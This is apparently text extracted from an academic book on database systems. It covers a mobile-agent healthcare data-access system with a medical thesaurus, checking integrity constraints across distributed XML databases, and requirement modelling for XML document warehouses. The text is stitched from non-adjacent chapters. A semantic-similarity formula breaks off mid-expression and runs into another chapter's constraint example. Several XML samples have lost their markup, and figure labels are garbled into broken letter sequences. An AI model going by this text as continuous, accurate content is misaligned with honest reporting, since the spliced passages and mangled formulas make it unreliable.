semistructured data. It relies on metadata describing the entities and the relationships between entities in a federated schema. These metadata appear to be created manually. While providing a new query language, this approach also raises questions about the accuracy of the metadata and extensibility of the system. The Query Integration System (QIS) of Marenco, Wang, Shepherd, Miller, and Nadkami (2004) is a database mediator framework that addresses robust data integration from continuously changing heterogeneous data sources in the biosciences. The QIS architecture is based on a set of distributed network-based servers, data-source servers, integration servers, and ontology servers that exchange metadata as well as mappings of both metadata and data elements to elements in an ontology. Metadata version difference determination coupled with the decomposition of stored queries is used as the basis for partial query recovery when the schema of data sources alters. The principal theme of this research is handling schema evolution. We developed a prototype of a mobile-agentbased mobile data-access system that deals with heterogeneous healthcare data-source integration and information retrieval (Jiao & Hurson, 2004). Our work differs from the previously mentioned research in several ways. First, MAMDAS utilizes the summary-schemas model for multidatabase organization (Bright et al., 1994). The hierarchical structure of SSM enables automated metadata population and improves search efficiency. Second, supporting user mobility is an emerging demand and it has not yet received enough attention in healthcare information-system research. We proposed to apply the mobile-agent technology to cope with this issue. Third, existing biomedical thesauri often demonstrate poor interoperability and reusability due to their nonstandard designs. We modified the MeSH thesaurus (Chevy, 2000) so that it complies with the ANSI/NISO (American National Standard Institute/National Information Standards Organization) Z39.19 monolingual
487
Integrating Mobile-Based Systems with Healthcare Databases
thesaurus-creation standard (NISO, 1994). In addition, most biomedical thesauri and ontologies are tailored to the needs of medical professionals and, thus, nonprofessionals often find them hard to use due to the lack of precise knowledge. We addressed this problem by augmenting MeSH terms with synonyms defined by a general English-lexicon thesaurus WordNet (Miller et al., 1990). Finally, MAMDAS can be coupled with thesauri or ontologies of different domains to provide an information-system infrastructure for various applications with minimal modification. In the following subsections, we briefly discuss the background information pertinent to the development of MAMDAS.
The Summary-Schemas Model The SSM consists of three major components: a thesaurus, local nodes, and summary-schemas nodes. Figure 1 depicts the structure of the SSM. The thesaurus defines a set of standard terms that can be recognized by the system, namely, global terms, and the categories they belong to. Each physical database (local nodes) may have its own dialect of those terms, called local terms. In order to share information among databases that speak in different dialects, each physical database maintains local-global schema metadata that map each local term into a global term in the format of “local term: global term.” Global terms are related through synonym, hypernym, and hyponym
links. The thesaurus also uses a semantic-distance metric (SDM) to provide a quantitative measurement of semantic similarity between terms. This feature allows for fine-grained semantic-based information retrieval. The cylinders and the ovals in Figure 1 represent local nodes and summary-schemas nodes, respectively. A local node is a physical database containing real data. A summary-schemas node is a logical database that contains metadata called summary schema, which store global terms and lists of locations where each global term can be found. The summary schema represents the schemas of the summary-schema node’s children in a more abstract manner; it contains the hypernyms of the input data. As a result, fewer terms are used to describe the information than the union of the terms in the input schemas. Figure 2 shows an example of the automated schema-abstraction process of four local terms, human face, ear, navel, and belly button, under the guidance of the MeSH thesaurus in a bottomup fashion. First, all local terms are mapped into global terms that are terms defined in MeSH. In the current prototype, this step is done by local database administrators manually. At SSM Level 1, the least common ancestors (immediate hypernyms) of the global terms are automatically identified by searching through the MeSH hierarchy: Head is the immediate hypernym of face and ear. Similarly, abdomen is the hypernym of umbilicus. At Summary Schemas Level 2, head
Figure 1. A summary-schemas model with M local nodes and N levels Root Node Level N-1
Thesaurus Summary-Schemas Nodes
Level 2 Level 1 (Local Nodes)
488
Integrating Mobile-Based Systems with Healthcare Databases
Figure 2. An example of the schema-summarization process
and abdomen are further abstracted into body regions. Finally, at Level 3, body region is found to be a hyponym of 1 of the 15 categories defined in MeSH: anatomy. The SSM is a tightly coupled federated database solution and the administrator is responsible for determining the logical structure of it. In other words, when a node joins or leaves the system, the administrator is notified and changes to the SSM are made accordingly. Note that once the logical structure is determined, the schema-population process is automated and does not require the administrator’s attention. The major contributions of the SSM include preservation of the local autonomy, high expandability and scalability, short response time, and the resolution of imprecise queries. Because of the unique advantages of the SSM, we chose it as our underlying multidatabase organization model.
network autonomously, migrate from host to host, and interact with other agents (Gray, Kotz, Cybenko, & Rus, 2000). Agent-based distributed application design is gaining prevalence, not because it is an application-specific solution—any application can be realized as efficiently using a combination of traditional techniques. It is more because of the fact that it provides a single framework that allows a wide range of distributed applications to be implemented easily, efficiently, and robustly. Mobile agents have many advantageous properties (Lange & Oshima) and we only highlight some of them here: •
The Mobile-Agent Technology An agent is a computer program that acts autonomously on behalf of a person or organization (Lange & Oshima, 1998). A mobile agent is an agent that can move through the heterogeneous
•
Support disconnected operations: Mobile agents can roam the network and fulfill their tasks without the owner’s intervention. Thus, the owner only needs to maintain the physical connection during submission and retraction of the agent. This asset makes mobile agents desirable in the mobile computing environment where intermittent network connection is often inevitable. Balance workload: By migrating from the mobile device to the core network, the agents can take full advantage of the high
489
Integrating Mobile-Based Systems with Healthcare Databases
•
bandwidth of the wired portion of the network and the high computation capability of servers and workstations. This feature enables mobile devices that have limited resources to provide functions beyond their original capability. Reduce network traffic: Mobile agents’ migration capability allows them to handle tasks locally instead of passing messages between the involved databases. Therefore, fewer messages are needed in accomplishing a task. Consequently, this reduces the chance of message losses and the overhead of retransmission.
Contemporary mobile-agent system implementations fall into two main groups: Java-based and non-Java-based. We argue that Java-based agent systems are better in that the Java language’s platform-independent features make it ideal for distributed application design. We chose the IBM Aglet Workbench SDK 2.0 (IBM Aglets Workbench, 1996) as the MAMDAS’ implementation tool.
DESIGN, FUNCTIONS, APPLICATION, AND PERFORMANCE EVALUATION OF MAMDAS AND MEDTHES Mobile-Agent-Based Mobile Data-Access System MAMDAS consists of four major logical components: the host, the administrator, the thesaurus, and the user (Jiao & Hurson, 2004). Figure 3 illustrates the overall architecture of MAMDAS. The MAMDAS can accommodate an arbitrary number of hosts. A HostMaster agent resides on each host. A host can maintain any number and any type of nodes (local nodes or summary-schemas nodes) based on its resource availability. Each NodeManager agent monitors and manipulates a node. The HostMaster agent is in charge of
490
all the NodeManager agents on that host. Nodes are logically organized into a summary-schemas hierarchy. The system administrators have full control over the structure of the hierarchy. They can construct the structure by using the graphical tools provided by the AdminMaster agent. In Figure 3, the solid lines depict a possible summary-schemas hierarchy with the darkened node as the root and the arrows indicating the hierarchical relation. The ThesMaster agent acts as a mediator between the thesaurus server and other agents. The dashed lines with arrows indicate the communication between the agents. The DataSearchMaster agent provides a query interface, the data-search window, to the user. It generates a DataSearchWorker agent for each query. The three dash-dot-dot lines depict the scenario that three DataSearchWorker agents are dispatched to different hosts and work concurrently. Once the administrator decides the summaryschemas hierarchy, commands will be sent out to each involved NodeManager agent to build the structure. NodeManagers at the lower levels export their schemas to their parents. Parent nodes contact the thesaurus and generate an abstract version of their children’s schemas. When this process reaches the root, the MAMDAS is ready to accept queries. The user can start querying by launching the DataSearchMaster on his or her own device, which can be a computer attached to the network or a mobile device. The DataSearchMaster sends out two UserMessengers (not shown in the figure): one to the AdminMaster and one to the ThesMaster. The UserMessengers will return to the DataSearchMaster with the summary-schemas hierarchy and the category information. The DataSearchMaster then creates a data-search window that shows the user the summary-schemas hierarchy and the tree structure of the category. The user can enter the keyword, specify the preferred semantic distance, choose a category, and select a node to start the search. After the user clicks on the “Submit” button, the DataSearchMaster
Integrating Mobile-Based Systems with Healthcare Databases
Figure 3. An overview of the MAMDAS system architecture
packs the inputs, creates a DataSearchWorker, and passes the inputs to it as parameters. Since the DataSearchMaster creates a DataSearchWorker to handle each query, the user can submit multiple queries concurrently. Once dispatched, the DataSearchWorker can intelligently and independently accomplish the search task by making local decisions without the owner’s interference. During the query execution, the DataSearchWorker may generate DataSearchSlaves by cloning itself. The slaves can then work in parallel and report results to their creator. Figure 4 describes the search algorithm. One of the major advantages of the MAMDAS framework is that it supports database heterogeneity and geographical distribution transparency. It provides the users with a uniform access interface. This property of MAMDAS significantly eases the
Figure 4. The search algorithm 1 2
3 4 5 6 7 8
9 10 11 12 13
Set all child nodes to be unmarked; WHILE (NOT (all term(s) are examined OR all child node(s) are marked)) IF (term is of interest) Mark all the child nodes that contain this term; ELSE CONTINUE; END IF END WHILE IF (no marked child node) Go to the parent node of the current node and repeat the search algorithm (if a summary schema term of the parent node only exists on the current node, we can skip this term); ELSE Create a DataSearchSlave for each marked child node; Dispatch the slaves to the destinations and repeat the search algorithm; END IF
491
Integrating Mobile-Based Systems with Healthcare Databases
use of the system and makes it possible for users with limited computer skills to benefit from it.
A Medical Thesaurus: MEDTHES The quality of the thesaurus is critical to the effectiveness of MAMDAS because it provides semantic-similarity measures to assist users in performing imprecise queries in which the query term is different than the indexing term of a document. The proliferation of biomedical research and the public demand of e-healthcare systems have stimulated the development of biomedical thesauri. Several examples include MeSH (Chevy, 2000), the Unified Medical Language System (UMLS; McCray & Nelson, 1995), and the Systematized Nomenclature of Medicine (SNOMED; Spackman, Campbell, & Cote, 1997). While the existing medical thesauri have helped immensely in information categorization, indexing, and retrieval, two major problems remain: •
•
Their designs do not follow any international or national thesaurus standard and therefore they could result in poor interoperability and reusability. They do not provide information regarding the semantic similarities among terms and, thus, the users are required to possess precise knowledge of the controlled vocabulary in order to make effective use of the thesaurus.
In order to alleviate these problems, we implemented a new medical thesaurus MEDTHES based on the medical thesaurus MeSH (Chevy, 2000) and the English-language thesaurus WordNet (Miller et al., 1990). It can be used as either a stand-alone thesaurus or an integral part of MAMDAS. In this subsection, we (a) briefly outline the ANSI/NISO standard for thesauri construction, (b) describe the two thesauri that have served as the foundation of MEDTHES, MeSH, and WordNet, (c) explain the concept of semantic similarity, (d) present the
492
implementation of MEDTHES, (e) demonstrate the functions provided by MEDTHES as a standalone thesaurus, and (f) show the integration of MEDTHES with MAMDAS.
The ANSI/NISO Z39.19 Standard The ANSI/NISO Z39.19 standard (NISO, 1994), entitled American National Standard Guidelines for the Construction, Format, and Management of Monolingual Thesauri, was developed by NISO and approved by ANSI. It provides guidelines for the design and use of thesauri, including rules for term selection, thesaurus structure, relation definitions, and thesaurus maintenance. Three types of semantic relationships between terms are distinguished in this standard: equivalence, hierarchical, and related. The equivalence relation establishes the link between synonyms, the hierarchical relationship provides links between terms that reflect general concepts (broader terms) and those that represent more specific information (narrower terms), and the related relationship exists among terms that have similar meanings or are often used in the same context but do not have hierarchical relationships. The design of MEDTHES follows this standard.
MeSH The MeSH (Chevy, 2000) thesaurus is the standardized vocabulary developed by the National Library of Medicine for indexing, cataloging, and searching the medical literature. Currently, it contains approximately 22,000 terms (called descriptors) that describe the biomedical concepts used in health-related databases such as MEDLINE (MEDLINE, 2005), which is an online bibliographic database of medicine, nursing, health services, and so forth. All descriptors in MeSH are organized into 15 categories. Each category is then further divided into more specific subcategories. Within each category, descriptors are organized in a hierarchical fashion of up to 11 levels. In addition
Integrating Mobile-Based Systems with Healthcare Databases
to the hierarchical structure, MeSH uses “Entry Term” or “See” references to indicate semantic relations such as synonyms, near synonyms, and related concepts of some terms. Although MeSH is comprehensive and well maintained, it has several drawbacks. First, the synonymous relationship is not clearly listed and not differentiated from the related-term relation in MeSH. Second, the design of MeSH does not follow the ANSI thesaurus standard, which may result in poor interoperability and reusability. Third, MeSH is tailored to the needs of medical professionals. Nonprofessionals often find it hard to perform queries due to the lack of precise knowledge. For instance, a nonprofessional would use search terms such as navel and belly button instead of the official term umbilicus when submitting a query. Unfortunately, the query will fail because these terms are not defined in MeSH. We addressed this problem by augmenting MeSH with the well-defined synonyms found in WordNet, which we will discuss next.
WordNet WordNet is an online thesaurus that models the lexical knowledge of the English language (Miller et al., 1990). It organizes English nouns, verbs, adjectives, and adverbs into synonym sets, called synsets. In other words, a synset is a list of synonymous terms. Each term in WordNet may have one or more meanings, and each meaning has a synset. Different synsets are connected through hierarchical relationships. In summary, WordNet is comprehensive and designed with the goal to include every English word; it makes a number of fine-grained distinctions among word meanings. Thus, we decided to take advantage of the well-defined synonyms of WordNet and use them to complement the MeSH thesaurus.
Semantic Similarity Synonyms and related terms obtained from a thesaurus are often used in query expansion for the purpose of improving the effectiveness of information retrieval (Shiri, Revie, & Chowdhury, 2002). However, in order to improve the quality of document ranking, a more fine-grained measure is needed to describe the degree of semantic similarity, or more generally, the relatedness between two lexically expressed concepts (Budanitsky & Hirst, 2001). Naturally, semantic distance is the inverse of semantic similarity. For example, the semantic distance between synonyms can be defined as zero, and that between antonyms can be defined as infinite. If a thesaurus provides functions that calculate the semantic similarity between terms, the users can perform fine-tuned queries by limiting the scope of the search via the constraint of semantic distance between the keyword and the search results. The user can indicate how closely the returned terms should be related to the keyword (searched term) by selecting preferred semanticdistance values. Two main categories of algorithms for computing the semantic distance between terms organized in a hierarchical structure (e.g., WordNet) have been proposed in the literature: distancebased approaches and information-content-based approaches. The general idea behind the distancebased algorithms (Leacock & Chodorow, 1998; Rada, Mili, Bicknell, & Blettner, 1989; Wu & Palmer, 1994) is to find the shortest path between two terms based on the number of edges, and then translate this distance into semantic distance. Information-content-based approaches (Jiang & Conrath, 1997; Rada et al.) are inspired by the perception that pairs of words that share many common contexts are semantically related. Thus, the basic idea of these methods is to quantify the frequency of the co-occurrences of words within various contexts.
493
Integrating Mobile-Based Systems with Healthcare Databases
In order to avoid the potential bias introduced by context selection, we chose to implement three distance-based algorithms in the MEDTHES prototype: the edge-counting algorithm (Rada et al., 1989), the Leacock and Chodorow (1998) algorithm, and the Wu and Palmer (1994) algorithm. The Edge-Counting Algorithm In the edge-counting algorithm, the semantic distance is defined as the number of edges (nodes) along the shortest path between any two terms. The Leacock and Chodorow Algorithm The relatedness measure proposed by Leacock and Chodorow (1998) also relies on the shortest path between two terms, t1 and t2. The relatedness between two terms, t1 and t2, is calculated as follows. relatedness (t1 , t 2 ) = − log
len(t1 , t 2 ) 2D
(1)
where relatedness (t1, t2) is the similarity of terms t1 and t2, len(t1,t2) is the length of the shortest path between two terms (using edge counting), and D is the maximum depth of the structure. Semantic distance is the inverse of relatedness (t1, t2), that is, 1 relatedness (t1 , t 2 ) .
The Wu and Palmer Algorithm The Wu and Palmer (1994) algorithm uses the term score to define how two terms are related to each other. It measures the score by considering the depth of the two terms t1 and t2 in the tree structure, along with the depth of the LCA (least common ancestor). The formula used to calculate the score is shown in Equation 2. score(t1 , t 2 ) =
2 * N3 N1 + N 2 + 2 * N 3
(2)
where N1 is the length of the shortest path from t1
494
to the LCA, N2 is the length of the shortest path from t2 to the LCA, and N3 is the length of the shortest path from the LCA to the root. The range of relatedness is 0< score(t1,t2) 40000. (//S1:PATIENTS, (./PATIENT,[ssn=./SSN,healthplan=./healthplan])), (//S1:CASES,(./CASE,[caseid=./CaseId,ssn=./ SSN])), (//S2:CLAIMS,(./CLAIM,[caseid=./CaseId,type=./ type])), healthplan = ‘B’,type = ‘Emergency’.
For the example contained in Figure 2, C1 is satisfied, but C2 is violated. C1 is satisfied for
555
Semantic Integrity Constraint Checking for Multiple XML Databases
the healthdb.xml as one of the arithmetic literals amount (node 25, value = 25000) > 40000 returns false and hence the whole conjunction for C1 evaluates to false. C2 is violated as the conjunction for C2 evaluates to true. Arithmetic literal, healthplan (node 7, value = ‘B’) = ‘B’ evaluates to true and similarly, type (node 27, value=’Emergency’) = ‘Emergency’ evaluates to true and hence the whole conjunction for C2 evaluates to true. We also note that keys introduced in (Chen et al., 2002a), can be expressed using our representation. Consider a key constraint, C3, which states that within the context of PATIENTS, a PATIENT is uniquely identified by SSN. Using the notation of (Chen et al., 2002a), C3 can be expressed as follows:
XCONSTRAINT CHECKER We first give the assumptions of the system and then present the detailed architecture of the XConstraint Checker.
Assumptions XConstraint Checker relies on the fundamental concepts (XConstraint, XUpdate) introduced in the second section. The assumptions we make for the XConstraint Checker are: 1.
DELETE $child, INSERT content [BEFORE | AFTER $child] and REPLACE $child with $content. The optional [BEFORE | AFTER $child] is applicable
C3:- (/HEALTHDB/S1:PATIENTS,(./PATIENT,{./SSN}))
A key constraint such as C3 could be expressed in our notation (a functional dependency) as two XConstraints: C31:(//S1:PATIENTS,(./PATIENT,[ssn=./SSN,name1=./ PName])), (//S1:PATIENTS,(./PATIENT,[ssn=./SSN,name2=./ PName])), name1 name2.
A restricted set of XUpdate language is considered without losing the generality of the approach. We permit the following SubOPs:
2.
for an ordered execution model of XML tree. Also, we restrict the updates to elementary updates. The elementary update considers: (1) updates occurring only on one single node of an XML tree and (2) updates with only one SubOP at a time. However, note that any update can be equivalently transformed into a set of elementary updates; therefore, we do not lose the generality of the approach. XML constraint representation follows from the second section.
This has some similarity with the notion of template dependencies (Elmasri & Navathe, 2003), wherein we can represent any general constraints in relations.
556
XConstraint Checker Architecture The internal architecture of the XConstraint Checker is presented in Figure 3. The XConstraint checker interfaces with the rest of the system as shown in Figure 1. The XConstraint Checker consists of the following modules. •
XUpdate Parser: parses an XUpdate statement input by the user and identifies the XNode Value List (XNVL), involved in the XUpdate.
Semantic Integrity Constraint Checking for Multiple XML Databases
XMetadatabase: stores and acts as a repository of global XConstraints. XMeta Extractor: extracts only the global XConstraints being affected by the XUpdate. XConstraint Decomposer: decomposes a global XConstraint into a set of sub XConstraints to be validated locally on remote sites.
The overall process of constraint checking is explained in the following four steps (see Figure 3).
Step 1 The user issues an XUpdate statement on one of the sites. Figure 4 gives the initial XML database state before the XUpdate statement is executed. For example, user issues an XUpdate statement, XU1 on site S2.
XU1 = FOR $cl in document(“healthdb.xml”)/HEALTHDB/S2: CLAIMS UPDATE $cl { INSERT 1 03/05/2004 25000 Emergency }
Figure 5 gives the modified tree representation of the healthdb.xml, if the update is successful. The nodes affected by the XUpdate are shown in filled circles.
Step 2 (XUpdate Parser) The XUpdate Parser parses the given XUpdate statement and identifies the XML node being
557
Semantic Integrity Constraint Checking for Multiple XML Databases
Figure 4. Tree representation of healthdb.xml before XUpdate
Figure 5. Modified tree representation of healthdb.xml, if XUpdate is successful
modified. The output from this step is the XML Node Value List (XNVL). XNVL = N(a1=v1,a2=v2,…,an=v n), where N is the node being updated and is obtained from the
558
$binding in the XUpdate syntax, v1,v2 ,…,vn
are the values being updated corresponding to the attributes a1,a 2 , … , a n. a1,a 2, …,a n are either the XML sub elements or XML attributes being updated and are obtained from
Semantic Integrity Constraint Checking for Multiple XML Databases
the content of the XUpdate statement. For the running example: XNVL = {/HEALTHDB/S2:CLAIMS/ CLAIM( CaseId = 1, ClaimDate = ‘03/05/2004’, Amount = 25000, Type=’Emergency’)}
Step 3 (XMeta Extractor) Let XU↓ denote the path involved in executing the XUpdate statement, XU on the XML tree T. Similarly, C↓ denotes the path in defining the constraint C. We say that an XUpdate, XU might violate a constraint C if, XU↓ ∩ C↓ is not empty. For the running example, XU1↓ corresponds to the following nodes: {20,21,22,23,24,25,26,27,28}, C1↓ matches {3,4,7,8,12,13,14,15,21,22,25,26,31,32,37,38} and C2↓ matches {3,4,7,8,12,13,14,15,21,22,27,28} (refer to Figure 5). XU1 ∩ C1↓ is not empty and XU1 ∩ C2 is also not empty; hence, both the constraints might be violated by the update statement. If a global schema or a global DTD is given, we can identify the list of global XConstraints that might be violated by simply consulting the global DTD. The XMeta Extractor identifies the list of constraints being affected by the XUpdate and constructs the XConstraint Source Table (XCST). XCST(Ci) = < Ci, list(Sj)>, where Ci is the constraint identifier and list(Sj) is the list of sites being affected by Ci. For the running example, XCST is given in Figure 6. The XMeta Extractor sends the XCST to the XConstraint Decomposer.
Figure 6. XCST Ci C1 C2
list(Sj) (S1,S2,S3) (S1,S2)
Step 4 (XConstraint Decomposer) The XConstraint Decomposer generates the set of sub XConstraints, Cij on the basis of locality of sites. Cij is the sub XConstraint corresponding to constraint - Ci and site - Sj. We present the algorithmic description of generating Cij’s in the next section. For the running example, C11, C12 , C13, C21 and C22 are generated. The values of the sub XConstraints are also given in the next section.
XCONSTRAINT DECOMPOSER The basic idea of XConstraint Decomposer is to decompose a global constraint into a conjunction of sub XConstraints, where each conjunct represents the constraint check as seen from each individual site. Given an XUpdate statement, a brute force approach would be to go ahead and update the XML document and then check for constraint violations. However, we want to be able to check for constraint violations without updating the database. In other words, the XUpdate is carried out only if it is a non constraint violator. Thus, we avoid any potential rollbacks. Our idea here is to scan through a global XConstraint Ci, XUpdate U and then generate a conjunction of sub XConstraints, Cij’s. The value of each conjunct (each Cij) is either false or true. If the overall value of conjunction is true, constraint Ci is violated (from Theorem 4.1). Algorithm 1 gives the constraint decompositions (Cij’s) corresponding to a global constraint Ci and an XUpdate statement involving an insert statement. Algorithm 1 takes as input XML Node Value List, XNVL (Step 2 of the third section) and XConstraint Source Table - XCST (Step 3 of the third section) and gives as output the sub XConstraints. XNVL (line 1) identifies the node N being inserted with the values v1…vn corresponding to attribute names, a1...an (similar to XUpdate syntax). The update is occurring on site Sm. The outer for loop variable i (line 4) loops through all
559
Semantic Integrity Constraint Checking for Multiple XML Databases
Algorithm 1 1: INPUT : (a) XNVL = $Sm:N(a1=v1,a2=v2,…,an=vn) on XML tree T // Note: insert is occurring on Site Sm 2: (b) XCST = < ,…, > 3: OUTPUT: list of sub XConstraints for each Ci affected by XUpdate, XU 4: for each i in {1…q} do 5: for each j in {1…ni} do 6: let Sj:(Q1,(Q1',[X1] ) ),…, Sj:(Qr,(Qr',[Xr] ) ) be XML literals and A be all arithmetic literals associated with Sj 7: if (j m) then 8: Cij = for $var1 in document(“T”)Q1.Q1', 9: for $var2 in document(“T”)Q2.Q2', …, 10: for $varr in document(“T”)Qr.Qr' 11: where 12: return 1 13: is obtained by joining variables with same name appearing in XML literals and including any arithmetic conditions 14: else if (j = m) then /* site where update is occurring */ 15: if (there exists variables in A that do not appear among X1…Xr) then 16: for each variable, ν in A that do not appear among X1…Xr do 17: let k be the site where ν appears as one of the XML literals, ( Sk:Q( Q'[X] ) ) 18: IPikd = for $ν in document (“T”)Q.Q' 19: where 20: return {$ν /tν } 21: tν is the path expression corresponding to $ν in XML literal and is obtained from X1…Xr and X and d is the nth intermediate predicate 22: end for 23: end if 24: Cij = return 1 if ( and A') else return 0 25: is obtained from XNVL and (logical and) X1…Xr A’ is A with IP’s replacing corresponding variables in A 26: end if 27: end for 28: end for
the constraints C1…Cq affected by the XUpdate. The inner for loop variable j (line 5) loops through each site < (S11,S12 ,…,S1n1),…,(Sq1,Sq2 ,…,Sqnq)> for each constraint Ci. Inside the for loop (lines 4-28), all the sub constraints Cij’s are generated. X1…Xr (line 6) denotes vector of user defined variable v
560
= path expression t in an XML literal (Definition 2.2). Q1.Q1' (line 8) denotes the conjunction of path expressions Q1 and Q1'. A critical feature of the algorithm is the generation of intermediate predicate, IP (line 18). IP’s are generated only at the site where update is occurring. For each vari-
Semantic Integrity Constraint Checking for Multiple XML Databases
able that occurs in a different site, we generate IP. Conceptually, IP denotes information that needs to be shared from a different site; implementation wise, IP is an XQuery returning the value of the variable from a different site. IPikd means the dth intermediate predicate corresponding to constraint Ci and site Sk. Theorem 4.1: The conjunction of sub XConstraints,
Cij’s generated from Algorithm 4.1 conclusively determines if an XUpdate statement violates a global XConstraint, Ci. Proof sketch:
1.
2.
3.
Given an XUpdate statement occurring on site Sm and a global constraint Ci, Ci can be written as conjunction of XML literals and arithmetic literals. If the whole conjunction evaluates to false, Ci is satisfied (from Definition 2.4). Each sub XConstraint Cij needs to achieve the exact same result as the XML literal and Arithmetic literals corresponding to site S j. At this point Cij falls in one of the two cases depending on the site Sj: Case 1: (j m) — This is the case where Cij corresponds to a site other than where update is occurring. The generation of Cij in this case involves computing appropriate join conditions and applying arithmetic conditions on XML literals and Arithmetic literals associated with Sj. Hence Cij naturally achieves the exact same result as the XML literals and Arithmetic literals associated with Sj. Case 2: (j = m) — This is the case where Cij corresponds to the site where update is occurring. The generation of Cij in this case consists of two parts. Part 1 consists of information from the same site Sj — trivial case (just like Case 1). Part 2 consists of
acquiring information from a different site. For each such variable, a unique intermediate predicate is generated. IP’s are XQueries that return the values of such variables by computing appropriate joins and arithmetic conditions involved with such variables. Hence, IP’s guarantee correct information exchange from a different site. The reason we generate unique IP’s is we can either store all the IP’s at a global directory such as the XMeta database or we can generate IP’s at run time. From steps 2 and 3, we observe that the conjunction of sub XConstraints Cij’s, entails the global XConstraint, Ci. Hence, if Ci determines whether an XUpdate violates the constraint, then conjunction of its Cij’s also determines if the constraint Ci is violated. In other words, if the whole conjunction of Ci evaluates to false, constraint Ci is not violated, otherwise Ci is violated.
Example 4.1 We illustrate working of the algorithm on a sample healthdb.xml (refer to Figure 7), when intermediate predicates are not involved. In Figure 7, we show a patient “John” (with SSN - “123”) is associated with two CaseIds, 1 and 3, and two treatments. Consider an XUpdate statement, XU1 occurring on site S2. XU1 = FOR $cl in document(“healthdb.xml”)/HEALTHDB/S2: CLAIMS UPDATE $cl { INSERT 1 03/05/2004 25000
561
Semantic Integrity Constraint Checking for Multiple XML Databases
Figure 7. A sample healthdb.xml document 123 John B 234 Clark C 1 123 10/14/2003 2 234 06/24/2004 3 123 10/12/2004 3 11/14/2004 40000 Inpatient 1 Mike 10/15/2003 SmallPox 3 Blake 10/14/2004 LegInjury
562
Semantic Integrity Constraint Checking for Multiple XML Databases
Emergency }
Applying STEPS 1-4 from the third section, we obtain: XNVL = {/HEALTHDB/S2:CLAIMS/CLAIM( CaseId = 1, ClaimDate = ‘03/05/2004’, Amount = 25000, Type=’Emergency’)} CDST (C1) = where C1:(//S1:PATIENTS, (./PATIENT,[ssn=./SSN,healthplan=./HealthPlan])), (//S1:CASES,(./CASE,[caseid=./CaseId,ssn=./ SSN])), (//S2:CLAIMS,(./CLAIM,[caseid=./CaseId,amount=./ Amount])), (//S3:TREATMENTS, (./TREATMENT,[caseid=./CaseId,disease=./ Disease])), healthplan = ‘B’,disease = ‘SmallPox’,amount > 40000.
So, C1 = C11 ^ C12 ^ C13. In this example, C11 = 1(true), C12 = 0(false) and C13 = 1(true). The conjunction of C11, C12 and C13 evaluates to false. Hence the update statement does not violate constraint C1 (from Theorem 4.1). Similarly: C21 = for $var1 in document(“healthdb.xml”)//S1_ PATIENTS/PATIENT, for $var2 in document(“healthdb.xml”)//S1_CASES/ CASE, where $var1/SSN = $var2/SSN and $var2/CaseId = 1 and $var1/HealthPlan = “B” return 1 C22 = return 1 if {1 = 1 and “Emergency” = “Emergency”}\ else return 0
So, C2 = C21 ^ C22. In this example, C21 = 1(true), C22 = 1(true). The conjunction of C21 and C22 evaluates to true. Hence the update statement violates constraint C2 (from Theorem 4.1). Note that C2 is defined in the second section..
Example 4.2 /* C11 is generated from Algorithm 4.1 (lines 7-13) */ C11 = for $var1 in document(“healthdb.xml”)//S1_ PATIENTS/PATIENT, for $var2 in document(“healthdb.xml”)//S1_CASES/ CASE, where $var1/SSN = $var2/SSN and $var2/CaseId = 1 and $var1/HealthPlan = “B” return 1 /* C12 is generated from Algorithm 4.1 (lines 14-26) */ C12 = return 1 if {1 = 1 and 25000 > 40000} else return 0 /* C13 is generated from Algorithm 4.1 (lines 7-13) */ C13 = for $var1 in document(“healthdb.xml”)//S3_TREATMENTS/ TREATMENT where $var1/CaseId = 1 and $var1/Disease = “SmallPox” return 1
Here, we illustrate generation of sub constraints when intermediate predicates are involved. For the example database given in Figure 7, consider C4, which states “A patient’s date of claim may not be earlier than his/her injury date”. Constraint C4 can be expressed as: C4:-(//S1:PATIENTS,(./PATIENT,[ssn=./SSN])), (//S1:CASES, (./CASE,[caseid=./CaseId,ssn=./SSN,idate=./ InjuryDate])), (//S2:CLAIMS,(./CLAIM,[caseid=./CaseId,cdate=./ ClaimDate])), cdate > P ubl_ Ab s trac t A bs t_P aperID A bs t_Contents
< < 3> > P ubl_ Re fer enc es Referenc e_ID Referenc e_Details Total_Referenc es
P ubl_P ers on P er_Title P er_F irs tNam e P er_Las tNam e P er_Contac tNO P er_A ddres s 1..n
1.. n P ubl_M onth 1..n
M onth_ID M onth_Nam e
1..n P ubl_City City _ID City _Nam e City _M ajorA ttrac tions City _S pec ialE vents
1..n
P ubl_K ey wor ds
P ubl_Chapter
K ey _P aperID K ey _K ey word
Ch_ID Ch_No Ch_Title Ch_K ey words
1 P ubl_Ins titute
1..n P ubl_Day Day _ID Day _Nam e Day _Date
1..n
1.. n
1 .. n
1.. n
P ubl_ Loc ation Loc _Lo c ationID Loc _Room No Loc _Capa c ity Loc _A V _F aci lity
b elongs _to
1..n
P ubl_Tim e m ay have 1
0.. n
S es s ion_ID S es s ion_Tim e S es s ion_Notes
P ubl_S ec tion S ec ti on_ID S ec ti on_Ti tl e S ec ti on_C ont ents S ec ti on_Fi gures S ec ti on_Tables
Ins t_ID Ins t_Nam e Ins t_Ty pe Ins t_Contac tP ers on Ins t_Contac tNO Ins t_A ddres s
n
587
Goal-Oriented Requirement Engineering for XML Document Warehouses
(CV). The CV in some cases may exist in a different document, which has no direct link with the immediately-related documents involved in a given query. Sort an already-generated outcome of a query based on a subject factor value (SFV). Retrieve elements attributes values by merging two or more documents.
4. 5.
above are identified solely but can be combined with one another, particularly when a requirement’s specification acquires a highly complex structure. The illustration with the requirements follows where we will show three examples of possible requirements extracted from our case study. Each of these requirements represents one or a combination of the several categories presented above.
The different types of requirements featured
Figure 5. VDim “Abstract_List” package contents < < V Di m > > A b s t ra c t _ L is t
< < V Di m > > A b s t ra c t s _ B y _ Y e a r
< < V D im > > A b s t ra c t s _ B y _ K e y w o rd
< < V D im > > A b s tr a c ts _ B y _ C o n fe ren c e
Goal-Oriented Requirement Engineering for XML Document Warehouses
Figure 7. XDW conceptual model (in UML)
Conference_List
Abstract_List
Abstract_List_By_Author
Proceedings (xFACT)
Publication_List
Author_List
Abs_Lst_By_Author_By_Year
ference names, the proposed query would perform a search within the document Publ_Conference and, more specifically, will extract the values of the element Conf_Name. Figure 8a shows how this specific requirement is modelled, based on our
Requirement 1: List of All Conference Names In order to generate the required list of all the con-
Figure 8. Figures 8(a) and 8(b): Requirement for list of all conferences names Di e si
e el
High Dimension Level
Conference Name List
High Level Requirement 1 1
1
1 XML Document
Publ_Conference
XML Document
Conf_Name
D cu e t e el
a Re uirement notation to extract a group of values
Re uirement notation implemented
589
Goal-Oriented Requirement Engineering for XML Document Warehouses
